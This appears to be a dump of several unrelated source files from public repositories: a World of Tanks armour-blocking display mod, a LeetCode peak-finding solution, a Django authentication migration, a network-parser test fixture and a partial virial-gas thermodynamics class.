'MSG_RECREATE_CONFIG_DONE': self.code_pa('конфиг создан УСПЕШНО') if self.ru else 'Config recreating DONE',
'MSG_INIT': self.code_pa('применение настроек...') if self.ru else 'initialized ...', 'MSG_LANGUAGE_SET': self.code_pa('Выбран язык:') if self.ru else 'Language set to:',
'MSG_DISABLED': self.code_pa('отключен ...') if self.ru else 'disabled ...'
}
def load_mod(self):
self.do_config()
self.sys_mess()
print ''
print '%s[%s, %s]' % (self.sys_mes['LOAD_MOD'], self.code_pa(self.description), self.code_pa(self.author))
if self.enable:
self.debugs('Debug Activated ...')
print '%s[%s %s %s...]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.sys_mes['MSG_LANGUAGE_SET'], self.code_pa(self.data['config'].get('language')))
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_INIT'])
else:
print '%s[%s, %s %s]' % (self.sys_mes['INFO'], self.code_pa(self.description), self.version, self.sys_mes['MSG_DISABLED'])
print ''
def save_config_debug(self):
new_config = self.load_json('armoring_extended', self.data, True)
self.data = new_config
self.do_config()
def load_config_debug(self):
new_config = self.load_json('armoring_extended', self.data)
self.data = new_config
self.do_config()
if armor:
armor.shout_damage()
class TextFlash(Flash):
def __init__(self, parent_ui, flash_name):
Flash.__init__(self, flash_name)
self.parentUI = parent_ui
self.isVisible = False
self.movie.backgroundAlpha = 0.0
self.component.wg_inputKeyMode = 2
self.component.position.z = 0.5
self.component.focus = False
self.component.moveFocus = False
self.component.heightMode = 'PIXEL'
self.component.widthMode = 'PIXEL'
self.flashSize = GUI.screenResolution()
self.text = {}
self.shadow = {}
self.background = {}
def start(self):
self.active(True)
self.visible_view(True)
self.component.visible = False
self.set_def_config()
self.update_pos()
def set_def_config(self):
text = config.data['flash'].get('text')
background = config.data['flash'].get('background')
shadow = config.data['flash'].get('shadow')
self.text['x'] = text['x']
self.text['y'] = text['y']
self.text['alignX'] = text['alignX']
self.text['alignY'] = text['alignY']
self.text['default_font'] = text['default_font']
self.text['default_font_size'] = text['default_font_size']
self.text['default_font_color'] = text['default_font_color']
self.background['enable'] = background['enable']
self.background['image'] = background['image']
self.background['x'] = background['x']
self.background['y'] = background['y']
self.background['width'] = background['width']
self.background['height'] = background['height']
self.background['alpha'] = background['alpha']
self.shadow['enable'] = shadow['enable']
self.shadow['distance'] = shadow['distance']
self.shadow['angle'] = shadow['angle']
self.shadow['color'] = shadow['color']
self.shadow['alpha'] = shadow['alpha']
self.shadow['size'] = shadow['size']
self.shadow['strength'] = shadow['strength']
def set_text_config(self, x=None, y=None, align_x=None, align_y=None, default_font=None, default_font_size=None, default_font_color=None):
if x is not None: self.text['x'] = int(x)
if y is not None: self.text['y'] = int(y)
if align_x is not None: self.text['alignX'] = '%s' % align_x
if align_y is not None: self.text['alignY'] = '%s' % align_y
if default_font is not None: self.text['default_font'] = '%s' % default_font
if default_font_size is not None: self.text['default_font_size'] = int(default_font_size)
if default_font_color is not None: self.text['default_font_color'] = '%s' % default_font_color
def set_background_config(self, enable=None, image=None, x=None, y=None, width=None, height=None, alpha=None):
if enable is not None: self.background['enable'] = enable
if image is not None: self.background['image'] = '%s' % image
if x is not None: self.background['x'] = int(x)
if y is not None: self.background['y'] = int(y)
if width is not None: self.background['width'] = int(width)
if height is not None: self.background['height'] = int(height)
if alpha is not None: self.background['alpha'] = int(alpha)
def set_shadow_config(self, enable=None, distance_shadow=None, angle_shadow=None, color_shadow=None, alpha_shadow=None, size_shadow=None, strength_shadow=None):
if enable is not None: self.shadow['enable'] = enable
if distance_shadow is not None: self.shadow['distance'] = int(distance_shadow)
if angle_shadow is not None: self.shadow['angle'] = int(angle_shadow)
if color_shadow is not None: self.shadow['color'] = '%s' % color_shadow
if alpha_shadow is not None: self.shadow['alpha'] = int(alpha_shadow)
if size_shadow is not None: self.shadow['size'] = int(size_shadow)
if strength_shadow is not None: self.shadow['strength'] = int(strength_shadow)
def destroy(self):
self.close()
def visible_view(self, boole):
self.isVisible = boole
self.component.visible = boole
def visible_tab(self, event):
isdown, key, mods, is_repeat = game.convertKeyEvent(event)
if not is_repeat and key == 15:
boole = not isdown if self.isVisible else False
self.component.visible = boole
def update_pos_debug(self, mod_x, mod_y):
self.text['x'] += mod_x
self.text['y'] += mod_y
self.background['x'] += mod_x
self.background['y'] += mod_y
def update_pos(self):
screen_gui = GUI.screenResolution()
screen_x = {'left': 0, 'center': screen_gui[0] / 2, 'right': screen_gui[0]}
screen_y = {'top': 0, 'center': screen_gui[1] / 2, 'bottom': screen_gui[1]}
if self.text['x'] + 10 > screen_gui[0]: self.text['x'] = screen_gui[0] - 10
if self.text['y'] + 10 > screen_gui[1]: self.text['y'] = screen_gui[1] - 10
x = self.text['x']
y = self.text['y']
align_x = self.text['alignX']
align_y = self.text['alignY']
elem_x = x + screen_x.get(align_x, 0)
elem_y = y + screen_y.get(align_y, 0)
self.set_position(elem_x, elem_y)
if self.background['x'] + 10 > screen_gui[0]: self.background['x'] = screen_gui[0] - 10
if self.background['y'] + 10 > screen_gui[1]: self.background['y'] = screen_gui[1] - 10
if self.background['enable']:
self.set_bg(self.background['image'], self.background['x'], self.background['y'], self.background['width'], self.background['height'], self.background['alpha'])
else:
self.set_bg(None, 0, 0, 0, 0, 0)
config.update_cord(self.text['x'], self.text['y'], self.background['x'], self.background['y'])
def set_position(self, pos_x, pos_y):
self.flash_call('setPosition', [pos_x, pos_y])
def set_visible(self, boole):
self.flash_call('setVisible', [boole])
def set_alpha(self, alpha):
self.flash_call('setAlpha', [alpha])
def set_shadow(self, distance_shadow, angle_shadow, color_shadow, alpha_shadow, size_shadow, strength_shadow):
self.flash_call('setShadow', [distance_shadow, angle_shadow, color_shadow, alpha_shadow, size_shadow, strength_shadow])
def set_bg(self, image_bg, x_pos_bg, y_pos_bg, width_bg, height_bg, alpha_bg):
self.flash_call('setBG', [image_bg, x_pos_bg, y_pos_bg, width_bg, height_bg, alpha_bg])
def set_text_flash(self, text):
text = '<font size="%s" face="%s" color="%s" >%s</font>' % (self.text['default_font_size'], self.text['default_font'], self.text['default_font_color'], text)
self.flash_call('setText', [text])
def set_text(self, text):
if self.isVisible:
self.component.visible = True
self.set_text_flash(text)
if self.shadow['enable']:
self.set_shadow(self.shadow['distance'], self.shadow['angle'], self.shadow['color'], self.shadow['alpha'], self.shadow['size'], self.shadow['strength'])
else:
self.set_shadow(0, 0, '#000000', 0, 0, 0)
def flash_call(self, func_name, args=None):
self.call('TextFlash.' + func_name, args)
class CustomFlash(object):
def __init__(self, flash_name):
self.data = TextFlash(weakref.proxy(self), flash_name)
class ArmoringExtended(object):
def __init__(self):
self.on_off = False
self.flash = None
self.num = 0
self.avgDMG = 0
self.SumAvgDmg = 0
self.list = {}
self.shots = 0
def cleanup_battle_data(self):
self.num = 0
self.avgDMG = 0
self.SumAvgDmg = 0
self.list = {}
self.shots = 0
@staticmethod
def message():
app = g_appLoader.getDefBattleApp()
if config.data['config'].get('only_HeavyTank'):
app.call('battle.PlayerMessagesPanel.ShowMessage',
[config.language['activate_message_only_HeavyTank'] + random.choice(string.ascii_letters), config.language['activate_message_only_HeavyTank'].decode('utf-8-sig'), 'gold'])
else:
app.call('battle.PlayerMessagesPanel.ShowMessage',
[config.language['activate_message'] + random.choice(string.ascii_letters), config.language['activate_message'].decode('utf-8-sig'), 'gold'])
def start_battle(self):
if not config.enable: return
if config.data['config'].get('only_HeavyTank'):
if 'heavyTank' in BigWorld.player().vehicleTypeDescriptor.type.tags:
self.on_off = True
else: self.on_off = True
if config.data['config'].get('activate_message') and self.on_off:
BigWorld.callback(5.0, self.message)
BigWorld.callback(5.0, self.shout_damage)
def clear_data(self):
self.avgDMG = 0
@staticmethod
def blocked_armor_hit(vehicle, decode_comp_name):
can_hit_primary_armor = None
comp_matrix = Math.Matrix(vehicle.appearance.modelsDesc[decode_comp_name.componentName]['model'].matrix)
first_hit_dir_local = decode_comp_name.matrix.applyToAxis(2)
first_hit_dir = comp_matrix.applyVector(first_hit_dir_local)
first_hit_point = decode_comp_name.matrix.translation
first_hit_pos = comp_matrix.applyPoint(first_hit_point)
world_to_veh_matrix = Math.Matrix(vehicle.model.matrix)
world_to_veh_matrix.invert()
start_point = world_to_veh_matrix.applyPoint(first_hit_pos - first_hit_dir)
end_point = world_to_veh_matrix.applyPoint(first_hit_pos + first_hit_dir.scale(10.0))
for compDescr, comp_matrix, isAttached in vehicle.getComponents():
if not isAttached: continue
collisions = compDescr['hitTester'].localHitTest(comp_matrix.applyPoint(start_point), comp_matrix.applyPoint(end_point))
if collisions is None: continue
for dist, _, hitAngleCos, matKind in collisions:
mat_info = compDescr['materials'].get(matKind)
can_hit_primary_armor = True if mat_info is not None and mat_info.useArmorHomogenization else False
if can_hit_primary_armor: break
if can_hit_primary_armor: break
return can_hit_primary_armor
def shout_damage(self):
if self.avgDMG != 0:
self.num += 1
self.SumAvgDmg += self.avgDMG
format_str = {'NumDmg': BigWorld.wg_getIntegralFormat(self.num), 'AvgDmg': BigWorld.wg_getIntegralFormat(self.SumAvgDmg)}
self.flash.data.set_text(config.language['main_text'].format(**format_str))
self.clear_data()
def shout_damage_hp(self, shots):
if self.list[shots]:
if self.list[shots]['isDamage']:
self.list[shots] = None
return
if self.list[shots]['avgDMG'] != 0:
self.num += 1
self.SumAvgDmg += self.list[shots]['avgDMG']
format_str = {'NumDmg': BigWorld.wg_getIntegralFormat(self.num), 'AvgDmg': BigWorld.wg_getIntegralFormat(self.SumAvgDmg)}
self.flash.data.set_text(config.language['main_text'].format(**format_str))
self.list[shots] = None
def shot(self, vehicle, attacker_id, points, effects_index):
if not (config.enable and self.on_off): return
if not vehicle.isStarted: return
if not vehicle.isPlayer: return
if BigWorld.player().team == BigWorld.player().arena.vehicles.get(attacker_id)['team']: return
if vehicle.health < 1: return
self.shots += 1
index_hit, decode_comp_name = DamageFromShotDecoder.decodeHitPoints(points, vehicle.typeDescriptor)
#compName = decode_comp_name[0].componentName if decode_comp_name else None
has_pierced_hit = index_hit >= VEHICLE_HIT_EFFECT.ARMOR_PIERCED
is_blocked = self.blocked_armor_hit(vehicle, decode_comp_name[0]) if decode_comp_name else False
if is_blocked:
for shell in BigWorld.player().arena.vehicles.get(attacker_id)['vehicleType'].gun['shots']:
if effects_index == shell['shell']['effectsIndex']:
type_shell = shell['shell']['kind']
if type_shell != 'HIGH_EXPLOSIVE':
self.avgDMG, _ = shell['shell']['damage']
if has_pierced_hit:
self.list[self.shots] = {'id': attacker_id, 'avgDMG': self.avgDMG, 'isDamage': False, 'used': False}
BigWorld.callback(0.15, partial(self.shout_damage_hp, self.shots))
else: self.shout_damage()
break
else: self.clear_data()
def heal(self, vehicle, new_health, attacker_id):
if not (config.enable and self.on_off): return
if not vehicle.isStarted or not vehicle.isPlayer: return
is_damage = max(0, new_health)
if is_damage:
for shots in self.list:
if self.list[shots] and 'id' in self.list[shots] and self.list[shots]['id'] == attacker_id and not self.list[shots]['used']:
self.list[shots]['isDamage'] = True
self.list[shots]['used'] = True
break
# deformed functions:
def hook_show_all(self_battle, old_hooked_show_all, is_show):
old_hooked_show_all(self_battle, is_show)
if config.enable:
if armor.flash is None: return
armor.flash.data.visible_view(is_show)
def hook_after_create(self):
hooked_afterCreate(self)
if config.enable:
armor.flash = CustomFlash('%s.swf' % config.name)
armor.flash.data.start()
g_guiResetters.add(armor.flash.data.update_pos)
config.do_config()
armor.cleanup_battle_data()
def hook_before_delete(self):
hooked_beforeDelete(self)
if config.enable:
armor.cleanup_battle_data()
if armor.flash is None: return
armor.flash.data.destroy()
g_guiResetters.discard(armor.flash.data.update_pos)
armor.flash.data = None
armor.flash = None
def hook_update_all(self):
hooked_update_all(self)
config.analytics()
def inject_handle_key_event(event):
if config.enable:
is_down, key, mods, is_repeat = game.convertKeyEvent(event)
if config.debug and armor.flash:
if key == Keys.KEY_NUMPAD6 and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
armor.flash.data.update_pos_debug(10, 0)
armor.flash.data.update_pos()
config.save_config_debug()
print 'position change x +10'
if key == Keys.KEY_NUMPAD4 and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
armor.flash.data.update_pos_debug(-10, 0)
armor.flash.data.update_pos()
config.save_config_debug()
print 'position change x -10'
if key == Keys.KEY_NUMPAD8 and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
armor.flash.data.update_pos_debug(0, -10)
armor.flash.data.update_pos()
config.save_config_debug()
print 'position change y -10'
if key == Keys.KEY_NUMPAD2 and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
armor.flash.data.update_pos_debug(0, 10)
armor.flash.data.update_pos()
config.save_config_debug()
print 'position change y +10'
if key == Keys.KEY_NUMPADMINUS and is_down and mods == config.setup['MODIFIER']['MODIFIER_ALT']:
config.load_config_debug()
armor.flash.data.update_pos()
print 'config reloaded'
def hook_vehicle_show_damage_from_shot(self, attacker_id, points, effects_index):
hooked_vehicle_show_damage_from_shot(self, attacker_id, points, effects_index)
if armor.on_off:
armor.shot(self, attacker_id, points, effects_index)
def hook_vehicle_on_health_changed(self, new_health, attacker_id, attack_reason_id):
hooked_vehicle_on_health_changed(self, new_health, attacker_id, attack_reason_id)
if armor.on_off:
armor.heal(self, new_health, attacker_id)
def hook_minimap_start(self):
hooked_minimap_start(self)
armor.start_battle()
#start mod
armor = ArmoringExtended()
config = Config()
config.load_mod()
#hooked
hooked_show_all = Battle.showAll
hooked_afterCreate = Battle.afterCreate
hooked_beforeDelete = Battle.beforeDelete
# noinspection PyProtectedMember
hooked_update_all = Hangar._Hangar__updateAll
hooked_vehicle_show_damage_from_shot = Vehicle.showDamageFromShot
hooked_vehicle_on_health_changed = Vehicle.onHealthChanged
hooked_minimap_start = Minimap.Minimap.start
#hook
Battle.showAll = lambda self_battle, is_show: hook_show_all(self_battle, hooked_show_all, is_show)
Battle.afterCreate = hook_after_create
Battle.beforeDelete = hook_before_delete
# noinspection PyProtectedMember
Hangar._Hangar__updateAll = hook_update_all
Vehicle.showDamageFromShot = hook_vehicle_show_damage_from_shot
Vehicle.onHealthChanged = hook_vehicle_on_health_changed
Minimap.Minimap.start = hook_minimap_start
#Inject
InputHandler.g_instance.onKeyDown += inject_handle_key_event
InputHandler.g_instance.onKeyUp += inject_handle_key_event
|
Codes/gracekoo/162_find-peak-element.py
|
liuxiaohui1221/algorithm
| 256 |
123056
|
# -*- coding: utf-8 -*-
# @Time: 2020/4/27 12:46
# @Author: GraceKoo
# @File: 162_find-peak-element.py
# @Desc: https://leetcode-cn.com/problems/find-peak-element/
from typing import List
class Solution:
def findPeakElement(self, nums: List[int]) -> int:
left = 0
right = len(nums) - 1
while left < right:
middle = (left + right) // 2
# 从middle左侧开始找峰值
if nums[middle] > nums[middle + 1]:
right = middle
# 从middle右侧开始找峰值
else:
left = middle + 1
return left
so = Solution()
print(so.findPeakElement([1, 2, 1, 3, 5, 6, 4]))
|
auth/migrations/0001_initial.py
|
ujlbu4/vas3k.club
| 496 |
123063
|
<filename>auth/migrations/0001_initial.py
# Generated by Django 3.0.4 on 2020-04-08 10:09
import uuid
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Apps',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('name', models.CharField(max_length=64, unique=True)),
('secret_key', models.CharField(max_length=128, unique=True)),
('app_key', models.CharField(max_length=256, unique=True)),
('redirect_urls', models.TextField()),
],
options={
'db_table': 'apps',
},
),
migrations.CreateModel(
name='Session',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('token', models.CharField(db_index=True, max_length=128, unique=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('expires_at', models.DateTimeField(null=True)),
('app', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='sessions', to='auth.Apps')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sessions', to='users.User')),
],
options={
'db_table': 'sessions',
},
),
]
|
src/genie/libs/parser/iosxe/tests/ShowAuthenticationSessionsInterfaceDetails/cli/equal/golden_output_10_expected.py
|
balmasea/genieparser
| 204 |
123078
|
<reponame>balmasea/genieparser
expected_output = {
"interfaces": {
"GigabitEthernet1/0/17": {
"mac_address": {
"0024.9bff.0ac8": {
"acct_session_id": "0x0000008d",
"common_session_id": "0A8628020000007168945FE6",
"current_policy": "Test_DOT1X-DEFAULT_V1",
"domain": "DATA",
"handle": "0x86000067",
"iif_id": "0x1534B4E2",
"ipv4_address": "Unknown",
"ipv6_address": "Unknown",
"user_name": "host/Laptop123.test.com",
"status": "Authorized",
"oper_host_mode": "multi-auth",
"oper_control_dir": "both",
"session_timeout": {"type": "N/A"},
"server_policies": {
1: {
"name": "ACS ACL",
"policies": "xACSACLx-IP-Test_ACL_PERMIT_ALL-565bad69",
"security_policy": "None",
"security_status": "Link Unsecured",
}
},
"method_status": {
"dot1x": {"method": "dot1x", "state": "Authc Success"},
"mab": {"method": "mab", "state": "Stopped"},
},
}
}
}
}
}
|
thermo/phases/virial_phase.py
|
RoryKurek/thermo
| 380 |
123084
|
# -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2019, 2020 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
__all__ = ['VirialCorrelationsPitzerCurl', 'VirialGas']
from fluids.numerics import newton
from chemicals.utils import log
from thermo.heat_capacity import HeatCapacityGas
from .phase import Phase
from chemicals.virial import BVirial_Pitzer_Curl, Z_from_virial_density_form
class VirialCorrelationsPitzerCurl(object):
def __init__(self, Tcs, Pcs, omegas):
self.Tcs = Tcs
self.Pcs = Pcs
self.omegas = omegas
self.N = len(Tcs)
def C_pures(self, T):
return [0.0]*self.N
def dC_dT_pures(self, T):
return [0.0]*self.N
def d2C_dT2_pures(self, T):
return [0.0]*self.N
def C_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
# Full return should be (Ciij, Ciji, Cjii), (Cijj, Cjij, Cjji)
# but due to symmetry there is only those two matrices
return Ciij, Cijj
def dC_dT_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
return Ciij, Cijj
def d2C_dT2_interactions(self, T):
N = self.N
Ciij = [[0.0]*N for i in range(N)]
Cijj = [[0.0]*N for i in range(N)]
return Ciij, Cijj
def B_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i]) for i in range(self.N)]
def dB_dT_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i], 1) for i in range(self.N)]
def B_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def dB_dT_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def B_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.B_pures(T)
B_interactions = self.B_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
def dB_dT_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.dB_dT_pures(T)
B_interactions = self.dB_dT_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
def d2B_dT2_pures(self, T):
Tcs, Pcs, omegas = self.Tcs, self.Pcs, self.omegas
return [BVirial_Pitzer_Curl(T, Tcs[i], Pcs[i], omegas[i], 2) for i in range(self.N)]
def d2B_dT2_interactions(self, T):
N = self.N
return [[0.0]*N for i in range(N)]
def d2B_dT2_matrix(self, T):
N = self.N
B_mat = [[0.0]*N for i in range(N)]
pures = self.d2B_dT2_pures(T)
B_interactions = self.d2B_dT2_interactions(T)
for i in range(N):
B_mat[i][i] = pures[i]
for i in range(N):
for j in range(i):
B_mat[i][j] = B_interactions[i][j]
B_mat[j][i] = B_interactions[j][i]
return B_mat
class VirialGas(Phase):
phase = 'g'
force_phase = 'g'
is_gas = True
is_liquid = False
ideal_gas_basis = True
pure_references = ('HeatCapacityGases',)
pure_reference_types = (HeatCapacityGas, )
def __init__(self, model, HeatCapacityGases=None, Hfs=None, Gfs=None,
T=None, P=None, zs=None):
self.model = model
self.HeatCapacityGases = HeatCapacityGases
self.Hfs = Hfs
self.Gfs = Gfs
if Hfs is not None and Gfs is not None and None not in Hfs and None not in Gfs:
self.Sfs = [(Hfi - Gfi)/298.15 for Hfi, Gfi in zip(Hfs, Gfs)]
else:
self.Sfs = None
for i in (zs, HeatCapacityGases, Hfs, Gfs):
if i is not None:
self.N = len(i)
break
if zs is not None:
self.zs = zs
if T is not None:
self.T = T
if P is not None:
self.P = P
if T is not None and P is not None and zs is not None:
Z = Z_from_virial_density_form(T, P, self.B(), self.C())
self._V = Z*self.R*T/P
def V(self):
return self._V
def dP_dT(self):
r'''
.. math::
\left(\frac{\partial P}{\partial T}\right)_{V} = \frac{R \left(T
\left(V \frac{d}{d T} B{\left(T \right)} + \frac{d}{d T} C{\left(T
\right)}\right) + V^{2} + V B{\left(T \right)} + C{\left(T \right)}
\right)}{V^{3}}
'''
try:
return self._dP_dT
except:
pass
T, V = self.T, self._V
self._dP_dT = dP_dT = self.R*(T*(V*self.dB_dT() + self.dC_dT()) + V*(V + self.B()) + self.C())/(V*V*V)
return dP_dT
def dP_dV(self):
r'''
.. math::
\left(\frac{\partial P}{\partial V}\right)_{T} =
- \frac{R T \left(V^{2} + 2 V B{\left(T \right)} + 3 C{\left(T
\right)}\right)}{V^{4}}
'''
try:
return self._dP_dV
except:
pass
T, V = self.T, self._V
self._dP_dV = dP_dV = -self.R*T*(V*V + 2.0*V*self.B() + 3.0*self.C())/(V*V*V*V)
return dP_dV
def d2P_dTdV(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial V\partial T}\right)_{T} =
- \frac{R \left(2 T V \frac{d}{d T} B{\left(T \right)} + 3 T
\frac{d}{d T} C{\left(T \right)} + V^{2} + 2 V B{\left(T \right)}
+ 3 C{\left(T \right)}\right)}{V^{4}}
'''
try:
return self._d2P_dTdV
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dTdV = d2P_dTdV = -self.R*(2.0*T*V*self.dB_dT() + 3.0*T*self.dC_dT()
+ V2 + 2.0*V*self.B() + 3.0*self.C())/(V2*V2)
return d2P_dTdV
def d2P_dV2(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial V^2}\right)_{T} =
\frac{2 R T \left(V^{2} + 3 V B{\left(T \right)}
+ 6 C{\left(T \right)}\right)}{V^{5}}
'''
try:
return self._d2P_dV2
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dV2 = d2P_dV2 = 2.0*self.R*T*(V2 + 3.0*V*self.B() + 6.0*self.C())/(V2*V2*V)
return d2P_dV2
def d2P_dT2(self):
r'''
.. math::
\left(\frac{\partial^2 P}{\partial T^2}\right)_{V} =
\frac{R \left(T \left(V \frac{d^{2}}{d T^{2}} B{\left(T \right)}
+ \frac{d^{2}}{d T^{2}} C{\left(T \right)}\right) + 2 V \frac{d}{d T}
B{\left(T \right)} + 2 \frac{d}{d T} C{\left(T \right)}\right)}{V^{3}}
'''
try:
return self._d2P_dT2
except:
pass
T, V = self.T, self._V
V2 = V*V
self._d2P_dT2 = d2P_dT2 = self.R*(T*(V*self.d2B_dT2() + self.d2C_dT2())
+ 2.0*V*self.dB_dT() + 2.0*self.dC_dT())/(V*V*V)
return d2P_dT2
def H_dep(self):
r'''
.. math::
H_{dep} = \frac{R T^{2} \left(2 V \frac{d}{d T} B{\left(T \right)}
+ \frac{d}{d T} C{\left(T \right)}\right)}{2 V^{2}} - R T \left(-1
+ \frac{V^{2} + V B{\left(T \right)} + C{\left(T \right)}}{V^{2}}
\right)
'''
'''
from sympy import *
Z, R, T, V, P = symbols('Z, R, T, V, P')
B, C = symbols('B, C', cls=Function)
base =Eq(P*V/(R*T), 1 + B(T)/V + C(T)/V**2)
P_sln = solve(base, P)[0]
Z = P_sln*V/(R*T)
# Two ways to compute H_dep
Hdep2 = R*T - P_sln*V + integrate(P_sln - T*diff(P_sln, T), (V, oo, V))
Hdep = -R*T*(Z-1) -integrate(diff(Z, T)/V, (V, oo, V))*R*T**2
'''
try:
return self._H_dep
except:
pass
T, V = self.T, self._V
V2 = V*V
RT = self.R*T
self._H_dep = H_dep = RT*(T*(2.0*V*self.dB_dT() + self.dC_dT())/(2.0*V2)
- (-1.0 + (V2 + V*self.B() + self.C())/V2))
return H_dep
def dH_dep_dT(self):
r'''
.. math::
\frac{\partial H_{dep}}{\partial T} = \frac{R \left(2 T^{2} V
\frac{d^{2}}{d T^{2}} B{\left(T \right)} + T^{2} \frac{d^{2}}{d T^{2}}
C{\left(T \right)} + 2 T V \frac{d}{d T} B{\left(T \right)}
- 2 V B{\left(T \right)} - 2 C{\left(T \right)}\right)}{2 V^{2}}
'''
try:
return self._dH_dep_dT
except:
pass
T, V = self.T, self._V
self._dH_dep_dT = dH_dep_dT = (self.R*(2.0*T*T*V*self.d2B_dT2() + T*T*self.d2C_dT2()
+ 2.0*T*V*self.dB_dT() - 2.0*V*self.B() - 2.0*self.C())/(2.0*V*V))
return dH_dep_dT
def S_dep(self):
r'''
.. math::
S_{dep} = \frac{R \left(- T \frac{d}{d T} C{\left(T \right)} + 2 V^{2}
\ln{\left(\frac{V^{2} + V B{\left(T \right)} + C{\left(T \right)}}
{V^{2}} \right)} - 2 V \left(T \frac{d}{d T} B{\left(T \right)}
+ B{\left(T \right)}\right) - C{\left(T \right)}\right)}{2 V^{2}}
'''
'''
dP_dT = diff(P_sln, T)
S_dep = integrate(dP_dT - R/V, (V, oo, V)) + R*log(Z)
'''
try:
return self._S_dep
except:
pass
T, V = self.T, self._V
V2 = V*V
self._S_dep = S_dep = (self.R*(-T*self.dC_dT() + 2*V2*log((V2 + V*self.B() + self.C())/V**2)
- 2*V*(T*self.dB_dT() + self.B()) - self.C())/(2*V2))
return S_dep
def dS_dep_dT(self):
r'''
.. math::
\frac{\partial S_{dep}}{\partial T} = \frac{R \left(2 V^{2} \left(V
\frac{d}{d T} B{\left(T \right)} + \frac{d}{d T} C{\left(T \right)}
\right) - \left(V^{2} + V B{\left(T \right)} + C{\left(T \right)}
\right) \left(T \frac{d^{2}}{d T^{2}} C{\left(T \right)} + 2 V
\left(T \frac{d^{2}}{d T^{2}} B{\left(T \right)} + 2 \frac{d}{d T}
B{\left(T \right)}\right) + 2 \frac{d}{d T} C{\left(T \right)}
\right)\right)}{2 V^{2} \left(V^{2} + V B{\left(T \right)}
+ C{\left(T \right)}\right)}
'''
try:
return self._dS_dep_dT
except:
pass
T, V = self.T, self._V
V2 = V*V
self._dS_dep_dT = dS_dep_dT = (self.R*(2.0*V2*(V*self.dB_dT() + self.dC_dT()) - (V2 + V*self.B() + self.C())*(T*self.d2C_dT2()
+ 2.0*V*(T*self.d2B_dT2() + 2.0*self.dB_dT()) + 2.0*self.dC_dT()))/(2.0*V2*(V2 + V*self.B() + self.C())))
return dS_dep_dT
def to_TP_zs(self, T, P, zs):
new = self.__class__.__new__(self.__class__)
new.T = T
new.P = P
new.zs = zs
new.N = self.N
new.HeatCapacityGases = self.HeatCapacityGases
new.model = self.model
new.Hfs = self.Hfs
new.Gfs = self.Gfs
new.Sfs = self.Sfs
Z = Z_from_virial_density_form(T, P, new.B(), new.C())
new._V = Z*self.R*T/P
return new
def to(self, zs, T=None, P=None, V=None):
new = self.__class__.__new__(self.__class__)
new.zs = zs
new.N = self.N
new.HeatCapacityGases = self.HeatCapacityGases
new.model = model = self.model
new.Hfs = self.Hfs
new.Gfs = self.Gfs
new.Sfs = self.Sfs
if T is not None:
new.T = T
if P is not None:
new.P = P
Z = Z_from_virial_density_form(T, P, new.B(), new.C())
new._V = Z*self.R*T/P
elif V is not None:
P = new.P = self.R*T*(V*V + V*new.B() + new.C())/(V*V*V)
new._V = V
elif P is not None and V is not None:
new.P = P
# PV specified, solve for T
def err(T):
# Solve for P matching; probably there is a better solution here that does not
# require the cubic solution but this works for now
# TODO: instead of using self.to_TP_zs to allow calculating B and C,
# they should be functional
new_tmp = self.to_TP_zs(T=T, P=P, zs=zs)
B = new_tmp.B()
C = new_tmp.C()
x2 = V*V + V*B + C
